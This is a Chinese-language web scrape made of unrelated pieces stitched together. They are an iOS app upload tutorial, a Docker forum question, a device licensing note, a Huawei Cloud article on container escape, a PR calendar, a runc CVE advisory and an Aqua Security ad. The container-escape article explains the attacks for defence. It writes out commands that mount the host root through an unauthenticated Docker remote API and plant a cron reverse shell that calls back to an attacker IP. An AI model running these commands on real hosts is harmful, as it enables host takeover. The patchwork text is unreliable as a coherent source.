随着Apple Store越来越成熟，以及越来越多的开发者和公司希望在该平台上投放自己的产品，iOS APP上架成为许多开发者和公司普遍关注的话题。但是，由于苹果App Store的审核政策日益严格，大多数开发者和公司都不太清楚iOS APP上架的具体流程。今天，我们将为您介绍iOS APP上架的具体流程，希望可以帮助您顺利的完成iOS APP的上架。1、准备App Store账号和必要的资料；2、登录App Store Connect并注册开发者账号；3、填写应用信息，包括：应用名称、描述、标签、版本等；4、上传产品报告文件；5、上传应用截图和APP文件；6、提交审核；7、审核通过后，即可在App Store上架。证书我们这边可以借助辅助工具appuploaderAppuploader可以辅助在Windows、linux或mac系统直接申请iOS证书p12，及上传ipa到App Store，最方便在Windows开发上架没有苹果Mac电脑的开发者！配合本教程使用，可以快速掌握如何真机测试及上架！点击苹果证书按钮点击新增 输入证书密码，名称这个密码不是账号密码，而是一个保护证书的密码，是p12文件的密码，此密码设置后没有其他地方可以找到，忘记了只能删除证书重新制作，所以请务必记住密码。还有为了安全起见，密码不要太简单。 证书名称是你为了在证书列表里面便于区别的一个字符，自己好辨识就可以，尽量是是字母和数字之类选择证书类型带distribution的是发布类型，带development的是开发类型。apple类型=ios+mac，所以开发时选择ios app development和apple development 类型都是可以的选择bundle id只有部分类型的证书需要选择bundle id，例如推送证书。因为大部分证书是不和app关联的。而是通过描述文件profile文件关联app。使用appuploader同步服务如果期望制作好证书后在其他电脑上同样可以下载到这个证书，或者和你同事同步此证书，则需要勾选使用appuploader服务同步。否则您需要手动管理p12文件在不同电脑之间的传输，并且一但创建下载后，无法在其他电脑下载，只能手动复制文件过去。一般情况下，推荐使用appuploader服务同步。证书类型说明IOS开发选择apple development或者ios app development 类型 ios 发布选择 apple distribution或者 ios distribution （app store and ad hoc） 开发推送证书选择 apple push notification service ssl (sandbox) 发布推送证书选择 apple push notification service ssl (sandbox & production)其他证书不是很常用，可以自行百度各种证书说明

各位老师，请问 我现在在服务器的docker环境里，起了容器（centos或者ubuntu） 让用户进行作为client机器访问集群，如何禁止用户在此容器里 的下载或者上传操作呢？我能想到的是 容器里 禁止安装rzsz等工具，请问有没有通过 端口号直接禁止相关操作的行为，或者其他方式？

背景：通过smartkit对AtlasEdge设备进行设备授权时出现执行命令失败排查方法：当授权模式是site, 当前针对MindX 3.0.RC3及之前的版本只支持容器部署、模型文件下载配置，如果下方了网管配置会导致执行命令失败当授权模式是CORE时，除了MindX 3.0.RC2支持Core 模板表格中的所有项外，其他版本（例如MindX 2.0.4.6 MindX 3.0.RC3）只支持imageSha256WhiteList、containerCpuLim、containerCpuLimit配置，如果配置下发了其他项会导致命令失败

>摘要：云原生2.0时代，任何企业都可以成为“新云原生企业”，作为云原生的代表技术之一的容器，每个企业都应该对容器安全有所了解。本文分享自华为云社区《[云原生2.0时代：企业更应了解一下容器安全](https://huaweicloud.blog.csdn.net/article/details/114066177)》，原文作者：华为助力企业上云。 随着云原生技术的成熟和市场需求的升级，云计算的发展已步入新的阶段，云原生2.0时代已经到来。从技术角度看，以容器、微服务以及动态编排为代表的云原生技术蓬勃发展，成为赋能业务创新的重要推动力，并已经应用到企业核心业务。从市场角度看，云原生技术已在金融、制造、互联网等多个行业得到广泛验证，支持的业务场景也愈加丰富，行业生态日渐繁荣。云原生2.0是企业智能升级的新阶段，企业云化从“ON Cloud”走向“IN Cloud”，新生能力与既有能力有机协同、立而不破，实现资源高效、应用敏捷、业务智能、安全可信，成为“新云原生企业”。 云原生2.0时代，任何企业都可以成为“新云原生企业”，作为云原生的代表技术之一的容器，每个企业都应该对容器安全有所了解。 传统的虚拟机能够基于虚拟化技术更加有效的利用硬件计算资源，可以实现云租户的隔离与资源共享。相比虚拟机来说，容器更轻、更快，但是作为一种新技术，容器的安全防护也与虚拟机所有不同。 # 容器 VS 虚拟机 容器与虚拟机具有相似的资源隔离和分配价值，但容器的作用不同，因为容器是虚拟化操作系统而不是硬件。容器更便携，更高效。  容器VS虚拟机 虚拟机（VM）是对物理硬件的抽象，将一台服务器转化为多台服务器。Hypervisor允许在一台机器上运行多个虚拟机。每个虚拟机都包含操作系统、应用程序、必要的二进制文件和库的完整副本，占用数十GB的空间。虚拟机启动速度也比较慢。 容器是应用程序层的一个抽象，将代码和依赖打包在一起。多个容器可以运行在同一台机器上，与其他容器共享操作系统内核，每个容器在用户空间中作为隔离的进程运行。容器比虚拟机占用更少的空间（容器镜像通常只有几十MB大小），可以处理更多的应用程序。 # 容器逃逸  容器逃逸，是容器技术启用以来一直被关注的问题，甚至被认为是容器的首要安全问题。所谓“逃逸”，指的是“流氓”容器/虚拟机尝试突破隔离环境的限制，访问宿主系统或者在同一个系统上的同驻容器或虚拟机。从而造成敏感信息泄露，或者系统及服务发生DOS的行为。  但正是由于容器与宿主系统共享内核，因此容器与宿主机有着更大的接触面，隔离层次更少，更容易从容器内实施逃逸攻击。因此，如何解决容器逃逸安全风险，避免容器逃逸攻击带来的损失是容器安全中最为重要的一个问题。 # 容器逃逸常用手段 ## （1）通过容器自身漏洞及内核漏洞逃逸  攻击的主要途径之一就是利用漏洞，通过程序设计或实现的缺陷来执行非法操作，容器逃逸也不例外。容器自身漏洞是其利用进行逃逸的路径之一，同时由于容器共享宿主系统内核，因此内核漏洞是其逃逸的另一路径，同时由于内核漏洞的数量远远大于容器自身漏洞，因此内核漏洞甚至成为容器逃逸更为主要的一个手段。 **1）利用容器漏洞逃逸 – shocker攻击** Shocker攻击是容器逃逸最著名的案例，其本质是利用了一个不常用的系统调用open_by_handle_at，同时借助docker1.0前版本并未限制CAP_DAC_READ_SEARCH能力，并将容器启动时会挂载宿主机文件到容器内（如旧版本的/.dockerinit，新版本的/etc/hosts）作为起点，执行暴力破解攻击，最终获取到要访问的宿主系统文件的句柄信息并进行读取，从而实现逃逸。 Github地址：https://github.com/gabrtv/shocker 容器执行shocker攻击逃逸访问宿主系统/etc/shadow文件：  2）内核漏洞利用逃逸 – dirtycow攻击  DirtyCow（脏牛漏洞，CVE-2016-5195）是Linux内核中的一个权限提升漏洞，其也可被容器利用实施逃逸。容器利用dirtycow漏洞改写虚拟动态共享库VDSO（Virtual Dynamically Shared Objec），并将shellcode置入其中，当主机系统进程调用并执行修改后的内容时，就会借用此进程身份执行置入的shellcode，并最终在容器内获得一个来自主机的root权限的shell。  ## （2）不安全配置引发逃逸 **1）不安全启动，如privileged特权容器** 容器以--privileged参数启动时称为特权容器，特权容器顾名思义具有较高权限，包括对宿主机上的设备的访问权限。因此，攻击者可以直接在容器内mount主机设备并进行文件访问，从而轻而易举实现逃逸。   **2）不安全挂载，如挂载docker.sock到容器**  图片来源：https://medium.com/better-programming/about-var-run-docker-sock-3bfd276e12fd Docker.sock文件是一个Unix domain socket文件，是Docker daemon默认监听的套接字文件，docker client通过它与docker daemon进行通信。docker client将信息查询和下发命令等请求通过docker.sock发给docker daemon，然后由deamon执行具体请求，包括镜像查询、容器创建等。 将docker.sock挂载到容器内，可以在容器内继续运行一个容器，实现docker in docker，并可在容器内容器启动时通过-v参数将宿主机根目录挂载到容器内，从而在容器内访问宿主机文件，实现逃逸。  **3）Docker remote api未授权访问** 默认情况下，docker daemon只允许通过unix domain socket – docker.sock进行本地通信操作，但除此之外，docker daemon也提供了Restful API供远端client访问（daemon通过-H参数指定监听端口），如果未对访问进行权限控制及合规性检查，则攻击者也可以访问这个API执行高危操作，并实施逃逸攻击。 例如一种攻击场景： - 通过Remote API创建一个容器，并将宿主系统根目录挂载到容器内： `# docker -H tcp://$IP:$PORT run -it -v /:/mnt ubuntu /bin/bash` 其中：$IP表示docker daemon服务ip，$PORT表示Remote API监听端口 - 将反弹shell命令写入计划任务文件 `# echo '* * * * * /bin/bash -i >& /dev/tcp/$IP/$PORT 0>&1' >> /mnt/var/spool/cron/crontabs/root` 其中：$IP表示攻击端IP，$PROT表示攻击端监听端口 - 攻击端监听上一步中的$PORT端口，获取来自对端（docker服务所在系统）的具有root权限得反弹shell，并任意访问。 # 华为云容器安全服务CGS之逃逸安全防护方案  # 华为云容器安全服务CGS 华为云容器安全服务CGS构建了容器安全威胁纵深防御体系，提供包括镜像扫描、威胁检测与威胁防护的一整套容器安全能力，提供针对容器的Build、Ship、Run全生命周期保护能力，渗透到整个容器DevOps流程，保证容器虚拟环境从开发到生产整个流程的安全。其中，容器逃逸检测是CGS的核心功能之一，它通过如下手段构建系统化的容器逃逸全面防护能力： ## （1）监控容器不安全配置启动 前文中提到，不安全配置是容器逃逸的一个重要原因。因此，监控容器的不安全启动也是容器逃逸防护的一个重要手段。CGS可以针对容器启动的各种不安全配置进行监控，包括启动特权容器、挂载宿主机文件、安全策略关闭、特权端口映射等，从容器创建伊始就检测逃逸风险，实现整体防护方案第一步。 ## （2）容器行为深度分析 容器启动后，CGS可对容器运行过程中的行为进行实时跟踪和观察，监控容器内的进程运行、文件访问、网络连接、系统调用等行为，并对行为进行深度分析，从行为过程体现出来的特征到行为所产生的结果进行全面分析检测，有效发现容器已知和未知漏洞利用逃逸攻击行为并进行告警。  ## （3）容器基线机器学习 一般而言，容器的行为通常固定且纯粹，比如一个提供web服务的容器内可能只会运行一个nginx进程，一个提供DB服务的容器内可能只会运行一个mysql进程，并且进程所执行的操作，包括文件访问、系统调用、网络连接等行为都有固定合理范围，因此可以对容器圈定正常行为范围，构建行为基线。CGS利用机器学习技术，从静态和动态两个维度分析容器正常行为并建立基线，使得基线模型更准确、更完整，然后根据基线跟踪容器行为，感知基线以外的异常行为，实现对攻击行为的全面感知，并有效提升对于容器利用0day漏洞进行逃逸攻击的检测能力。  华为云CGS容器逃逸方案防护机制内置在防护平台，无需用户参与即可实现容器逃逸系统化检测，具有良好的易用性，同时方案采用事件驱动机制实现性能高、反应快，为容器安全保驾护航。

发布时间分类主题发布渠道　1月 新闻稿厚积薄发，华为云构筑原生冰山安全体系，守护云上安全微信Link活动软文摆脱潜在安全威胁，华为云威胁检测服务MTD公测上线！微信Link2月 新闻稿2020华为云安全年度盘点微信Link产品软文这就是你亟需的那份防盗指南？微信Link产品软文云原生2.0时代，企业都应该了解的容器安全IT168LinkCSDNLink至顶网Link知乎Link搜狐号Link企鹅号Link华为云社区Link3月 新闻稿华为云数据安全中心服务正式商用微信Link今日头条Link网易新闻LinkIT168Link天极网Link产品软文云上风险听诊器——华为云威胁检测服务今日头条Link腾讯客户端Link凤凰网Link搜狐网Link极客公园Link51ctoLinkCSDNLinkDOITLinkDOSTORLink天极网Link华为云社区Link活动软文大揭秘！华为云“安全镖局”的秘密法宝竟然是……微信Link今日头条Link4月产品软文打造黄金镜像，智能反逃逸，揭秘华为云CGS的容器防护 “魔法”今日头条Link凤凰网LinkIT168Link产品软文华为云原生安全能力释放，守护蘑菇街更安全凤凰网LinkIT168Link搜狐网Link5月产品软文华为云厚积薄发，大展“云上安全”宏图！——2021企业上云安全指南【华为云社区】Link【今日头条】Link百家号Link极客网Link砍柴网Link东方财富网Link中国经营网Link搜狐网LinkZAKERLink产品软文新一代云原生防火墙即将闪亮登场，智简安全一键开启微信Link【今日头条】Link搜狐网Link凤凰网LinkCTI论坛LinkZOL云计算Link上云无忧Link 新闻稿华为云发布安全生态“沧海行动”计划，共建云原生安全新生态微信LinkIT 168Link新闻稿一键开启云上安全，华为云CFW云防火墙正式发布！微信Link【今日头条】Link6月微信Link产品软文让应用更安全，华为云应用信任中心ATC正式公测IT168 Link飞象网Link今日头条Link产品软文为企业云化全面“体检”，华为云升级云服务基线检测功能今日头条Link网易Link百家号Link中国经营网Link凤凰网LinkCSDNLink7月热点追踪数据安全法来了，做好数据安全保护看这里！微信Link活动软文三大看点干货，华为云为企业应用防护再出大招？微信Link活动软文保障云上安全，我们是专业的！微信Link新闻稿 大招齐放，安全感爆棚微信Link新闻稿华为云发布四大安全新品，牢筑企业应用安全防线【今日头条】Link产品软文 智护业务安全，华为云安全运营新品组合出击微信Link新闻稿华为云通过德国C5:2020标准审计【今日头条】Link新闻稿华为云联合信通院发布《云服务安全治理白皮书》微信Link【今日头条】Link8月产品软文守卫个人信息安全，这件利器值得拥有//个人信息保护法关联宣传微信Link产品软文威胁检测服务赐您“火眼金睛” ，让潜在威胁无处遁行【云图说】Link9月产品软文数据安全保护，八招致胜微信Link【今日头条】Link搜狐网Link10月产品软文华为云WAF，智能CC防护舍我其谁微博Link【今日头条】Link知乎Link新闻稿一个来自“天府之国”的邀约【今日头条】Link微信Link搜狐Link华为云社区Link新闻稿2021国际网络安全高峰论坛-华为云云原生安全论坛，四大看点抢先知！/加码云原生安全，华为云又放大招？百家号Link腾讯客户端Link四川新闻网Link华西都市网Link凤凰网Link中关村在线Link极客网Link新闻稿华为云发布《企业上云安全白皮书》，助力客户上云安全极客公园Link天极网LinkIT168Link砍柴网Link【今日头条】Link搜狐Link新闻稿华为云发布零信任能力成熟度模型白皮书，推动行业零信任能力建设中关村在线Link极客网Link天极网LinkIT168Link【今日头条】Link搜狐Link新闻稿华为云发布混合云解决方案安全白皮书，构建安全可信的云上环境IT之家Link至顶网LinkITbearLinkC114通信网Link【今日头条】Link搜狐Link新闻稿华为云首次提出“安全零摩擦”理念，打造智能极简云原生安全/华为云提供安全服务组合的四化能力，智护企业实现业务安全零摩擦腾讯客户端Link搜狐客户端Link凤凰网Link极客公园Link至顶网LinkIT168Link中国应急安全网Link移动安全网Link【今日头条】Link搜狐Link新闻稿华为云发布安全治理云图Compass，提升企业合规上云效率/华为云发布安全治理云图——安全治理即服务，合规上云腾讯客户端Link百家号Link财经网Link极客公园LinkIT168Link凤凰网Link中国应急安全网Link【今日头条】Link新闻稿华为云数据安全中心全新升级，守护数据的全生命周期安全腾讯客户端Link百家号Link中关村在线Link极客网Link至顶网Link金融界Link凤凰网Link中国应急安全网Link【今日头条】Link11月产品软文以零信任构建安全防护，让安全和访问自由兼得 【今日头条】Link知乎Link搜狐Link

一、概要近日，华为云关注到业界有安全研究人员披露runc 符号链接挂载与容器逃逸漏洞（CVE-2021-30465），攻击者可通过创建恶意POD及container，利用符号链接以及条件竞争漏洞，可挂载宿主机目录至 container 中，最终可能会导致容器逃逸。目前漏洞细节、POC已公开，风险高。华为云提醒使用runc的用户及时安排自检并做好安全加固。参考链接：mount destinations can be swapped via symlink-exchange to cause mounts outside the rootfs二、威胁级别威胁级别：【严重】（说明：威胁级别共四级：一般、重要、严重、紧急）三、漏洞影响范围影响版本：runc <= 1.0.0-rc94安全版本：runc 1.0.0-rc95 四、漏洞处置目前官方已在最新的版本中修复了该漏洞，请受影响的用户及时升级：https://github.com/opencontainers/runc/releases华为云容器安全服务CGS已具备该逃逸漏洞的预防与逃逸行为检测能力，使用华为云容器安全服务的用户可参考如下操作指导进行配置：https://support.huaweicloud.com/usermanual-cgs/cgs_01_0019.html注：修复漏洞前请将资料备份，并进行充分测试。

容器作为一种轻量级的虚拟技术，使应用程序认为他们自己有一个专门为他们服务的完整的操作系统，其帮助开发人员实现了更简单的封装、快速的程序部署、减少程序的环境依赖并支持横向的可扩展性。然而这种通用包装服务模式，其将每个容器视为“服务单位”，大大降低了程序的透明度和可审计性， 那么我们如何在不损失容器带来的优点情况下保证容器及其内运行程序的安全性？Aqua Security做为专门为容器技术设计的安全性产品，给予企业容器虚拟环境从开发到生产整个周期的安全性，减少IT安全部门与开发部门的协调沟通成本，并对容器内部的应用程序活动具有高可见性，允许组织检测和防范可疑活动和实时攻击。其同时还通过以下几点来提高企业内部容器虚拟环境的安全性：l 定期同步Registry内的images并进行安全扫描，可根据预先设置的规则，比如CVE总体威胁级别、CVE评分等，自动禁用威胁image。l 所有的威胁扫描条目都与云端同步，保证实效性。l 可自定义image镜像执行的白名单和黑名单，也允许用户自定义Base OS image （操作系统模板镜像）。l 可与Jenkins等常用CI/CD程序整合，在自动打包image时即进行威胁扫描。l 可查看Host主机上所有运行及停止状态容器的详细信息，包括威胁漏洞、环境变量、挂载卷、已安装包、容器配置等。l 对Host及容器内部都有详细的活动日志记录。l 可针对容器运行状态设置自定义的安全规则，如只读文件、运行容器的OS用户、执行命令、挂载盘、特权参数、环境变量参数等，保证容器运行时的合规性、安全性。l 可自主学习相关容器运行时的操作，根据学习到的结果自动生成安全规则赋予容器。l 可针对Host主机的操作系统用户定义不同角色，实现用户docker相关命令的颗粒化权限管理。l 可针对容器与容器、容器与Host、Host与其他节点之间设置网络防火墙策略，实现Docker容器虚拟环境的网络监管。l 可将内部数据导入到Splunk、ArcSight等其他日志收集程序进行分析、联动l 集中化管理容器运行时的敏感信息（Secret），并以环境变量的方式注入容器。注入后密码信息只能通过容器内部获取，无法通过外部Inspect等命令得到。同时Aqua Security也支持和CyberArk、Azure Key Vault、Amazon Key Management Store等的整合，将这些敏感信息储存在这些第三方程序内并调用。 http://www.aqua-sec.com.cn 如果有需要请直接联系我们, [email]ChinaSupport@edvancesecurity.com[/email], 电话：400-099-2608。